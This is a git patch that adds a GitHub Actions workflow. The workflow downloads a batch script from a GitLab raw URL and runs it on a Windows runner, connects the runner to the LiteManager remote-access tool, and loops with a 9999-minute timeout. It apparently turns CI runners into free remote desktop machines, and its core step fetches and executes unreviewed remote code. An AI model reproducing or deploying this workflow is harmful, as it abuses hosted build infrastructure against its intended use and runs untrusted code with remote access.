From de52bca0766ec35ba04a7f6fac2c202665eb994e Mon Sep 17 00:00:00 2001 From: ghartakham <118033532+ghartakham@users.noreply.github.com> Date: Tue, 10 Sep 2024 14:16:10 +0600 Subject: [PATCH] Create Windus.yml --- .github/workflows/Windus.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 .github/workflows/Windus.yml diff --git a/.github/workflows/Windus.yml b/.github/workflows/Windus.yml new file mode 100644 index 0000000..b85b1fa --- /dev/null +++ b/.github/workflows/Windus.yml @@ -0,0 +1,22 @@ +name: Windus + +on: + workflow_dispatch: + +jobs: + build: + name: Start Building... + runs-on: windows-latest + timeout-minutes: 9999 + + steps: + - name: Downloading & Installing Essentials + run: | + Invoke-WebRequest -Uri "https://gitlab.com/chamod12/lm_win-10_github_rdp/-/raw/main/Downloads.bat" -OutFile "Downloads.bat" + cmd /c Downloads.bat + + - name: Connect to LiteManager + run: cmd /c show.bat + + - name: Time Counter + run: cmd /c loop.bat